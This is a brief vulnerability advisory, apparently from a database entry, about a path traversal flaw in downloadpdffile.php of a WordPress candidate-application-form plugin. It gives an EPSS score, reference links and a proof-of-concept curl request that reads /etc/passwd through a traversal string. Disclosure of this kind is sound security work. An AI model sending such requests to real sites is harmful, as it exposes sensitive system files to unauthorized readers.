0.053 Low
EPSS
Percentile
93.1%
Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
packetstormsecurity.com/files/132960/
vapid.dhs.org/advisory.php?v=142
vulners.com/exploitdb/EDB-ID:37754